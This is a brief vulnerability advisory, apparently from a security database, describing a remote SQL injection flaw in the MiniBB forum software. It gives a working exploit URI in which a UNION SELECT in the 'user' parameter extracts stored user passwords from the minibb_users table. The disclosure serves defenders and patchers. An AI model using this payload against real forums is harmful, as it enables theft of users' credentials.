MiniBB Remote SQL Injection Vulnerability

MiniBB Remote SQL Injection Vulnerability

An example URI sufficient to exploit this vulnerability has been provided:

http://www.example.com/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/*